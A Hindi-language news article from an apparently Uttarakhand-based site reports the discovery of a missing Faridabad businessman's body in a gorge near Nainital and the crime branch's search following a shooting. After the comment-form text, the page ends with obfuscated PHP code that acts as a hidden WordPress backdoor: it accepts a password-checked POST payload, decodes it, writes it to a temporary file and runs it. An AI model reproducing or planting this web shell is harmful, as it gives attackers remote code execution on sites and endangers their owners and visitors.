हल्द्वानी: खाई में पड़ा मिला फरीदाबाद के व्यक्ति का शव, पोस्टमार्टम के बाद ही मौत का कारण आयेगा सामने..

Uttarakhand Press News, 05 June 2023: नैनीताल: शहर के हल्द्वानी मार्ग में आम पड़ाव के पास खाई में संदिग्ध अवस्था में एक व्यक्ति का शव मिलने से सनसनी फैल गई। मृतक की पहचान फरीदाबाद निवासी नगेंद्र चौधरी पुत्र रणजीत चौधरी के रूप में हुई है। जिस पर फरीदाबाद में एक व्यक्ति ने फायरिंग कर उसे वाहन में डाल फरार हो गया था।फरीदाबाद से पहुंची क्राइम ब्रांच की 10 से 12 कर्मियों की टीम ने ज्योलीकोट पुलिस की मदद से शव खाई से बरामद किया। मृतक फरीदाबाद में कपड़े और शराब का बड़ा कारोबारी बताया जा रहा है।

खाई में मिला अज्ञात व्यक्ति का कई दिन पुराना शव:
जानकारी के मुताबिक बीते तीन दिनों से फरीदाबाद हरियाणा से क्राइम ब्रांच के 10 से 12 लोगों की टीम क्षेत्र से अगवा हुए कारोबारी की तलाश कर रही थी। रविवार शाम आम पड़ाव क्षेत्रवासियों ने ज्योलीकोट पुलिस को सूचना दी कि सड़क से नीचे खाई में एक अज्ञात व्यक्ति का सड़ा गला शव पड़ा हुआ है। जिससे तेज दुर्गंध आ रही है। सूचना के बाद ज्योलीकोट पुलिस ने संबंधित टीम से संपर्क कर खाई में उतर कर देखा तो सड़ी गली अवस्था में एक व्यक्ति का शव बरामद हुआ। साथ में मौजूद टीम ने शव की शिनाख्त नगेंद्र चौधरी पुत्र रणजीत चौधरी के रूप में की। सड़क से करीब ढाई सौ मीटर नीचे गहरी खाई होने के कारण एसडीआरएफ की टीम बुलाकर रेस्क्यू कर शव को खाई से बाहर निकाला गया।

पोस्टमार्टम के बाद ही मौत का कारण आयेगा सामने:
सीओ विभा दीक्षित ने बताया कि मृतक की शिनाख्त हो जाने के बाद स्वजनों को बुलाकर पंचनामा की कार्यवाही की जा रही है। फिलहाल शव बेहद सड़ी गली अवस्था में मिला है। जिससे मौत के स्पष्ट कारणों का पता नहीं लग पा रहा है। पोस्टमार्टम रिपोर्ट के बाद ही मौत के स्पष्ट कारणों का पता लग पाएगा

फायरिंग के बाद गुम हो गया था मृतक:
सूत्रों के मुताबिक बीते 30 मई को फरीदाबाद में मृतक के ऊपर एक व्यक्ति ने फायरिंग कर दी थी। जानकारी मिल रही है कि फायरिंग के बाद आरोपी मृतक को वाहन में बिठा कर फरार हो गया था। मामले में मोहम्मद सिकरी थाना फरीदाबाद में संबंधित व्यक्ति के खिलाफ फायरिंग करने समेत अन्य धाराओं में मुकदमा दर्ज है। जिसके बाद तीन दिन से क्राइम ब्रांच की 10 से 12 कर्मियों की टीम कारोबारी की तलाश में जुटी हुई थी। ग्रामीणों की सूचना मिलने के बाद टीम को खाई से शव बरामद करने में सफलता मिल सकी।

सीसीटीवी फुटेज क्राइम ब्रांच टीम को खींच लाया नैनीताल:
फरीदाबाद में हुई फायरिंग और कारोबारी के लापता होने के मामले में मुकदमा दर्ज होने के बाद क्राइम ब्रांच की टीम ने मामले की जांच पड़ताल शुरू की। सूत्रों के मुताबिक फायरिंग वाले घटनास्थल में आरोपी के वाहन की पहचान के बाद क्षेत्र के सीसीटीवी कैमरा को खंगाला गया। फुटेज की मदद से आरोपित का वाहन नैनीताल आने की पुष्टि हुई। जिस कारण बीते तीन दिनों से टीम आसपास के क्षेत्रों में पूछताछ और जांच पड़ताल में जुटी हुई थी।

Read Previous

हल्द्वानी: नशे में धुत कार चालक ने चार लोगों को रौंदा, फिर बिजली के पोल से टकराई नशेड़ी की कार..

Read Next

Uttarakhand: पति की मौत के बाद शुरू हुआ प्रेम-प्रसंग, प्रमी ने शादी का वादा कर बनाए संबंध फिर दी जान से मारने की धमकी..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}